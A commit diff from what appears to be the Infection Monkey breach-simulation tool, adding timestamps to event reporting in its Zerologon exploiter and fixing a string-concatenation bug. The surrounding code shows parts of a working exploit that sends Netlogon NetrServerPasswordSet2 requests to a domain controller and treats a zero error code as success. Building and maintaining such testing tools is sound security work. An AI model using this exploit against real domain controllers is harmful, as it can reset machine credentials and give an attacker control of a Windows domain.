Agent: Add timestamps to publish calls

2022-10-07 20:27:14 +00:00 · 2022-10-07 20:27:14 +00:00 · 88d2bf7140
parent 8eb3c94a94
commit 88d2bf7140
1 changed files with 14 additions and 17 deletions
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@ -187,19 +187,20 @@ class ZerologonExploiter(HostExploiter):

    def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
        for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
-            exploit_attempt_result = self.try_exploit_attempt(rpc_con)
+            exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)

-            is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
+            is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
            if is_exploited:
                return True

        return False

-    def try_exploit_attempt(self, rpc_con) -> Optional[object]:
+    def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
        error_message = ""
+        timestamp = time()
        try:
            exploit_attempt_result = self.attempt_exploit(rpc_con)
-            return exploit_attempt_result
+            return exploit_attempt_result, timestamp
        except nrpc.DCERPCSessionError as err:
            # Failure should be due to a STATUS_ACCESS_DENIED error.
            # Otherwise, the attack is probably not working.
@ -210,12 +211,9 @@ class ZerologonExploiter(HostExploiter):
            error_message = f"Unexpected error: {err}"
            logger.info(error_message)

-        self._publish_exploitation_event(
-            success=False,
-            error_message=error_message,
-        )
+        self._publish_exploitation_event(timestamp, False, error_message=error_message)

-        return None
+        return None, timestamp

    def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
        request = nrpc.NetrServerPasswordSet2()
@ -236,25 +234,24 @@ class ZerologonExploiter(HostExploiter):
        request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
        request["Authenticator"] = authenticator

-    def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
+    def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
        if exploit_attempt_result:
            if exploit_attempt_result["ErrorCode"] == 0:
                self.report_login_attempt(result=True, user=self.dc_name)
                _exploited = True
                logger.info("Exploit complete!")

-                self._publish_exploitation_event(success=True)
+                self._publish_exploitation_event(timestamp, True)
            else:
                self.report_login_attempt(result=False, user=self.dc_name)
                _exploited = False
-                error_message = f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
-                "Something went wrong."
+                error_message = (
+                    f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
+                    "Something went wrong."
+                )
                logger.info(error_message)

-                self._publish_exploitation_event(
-                    success=False,
-                    error_message=error_message,
-                )
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
            return _exploited

        return False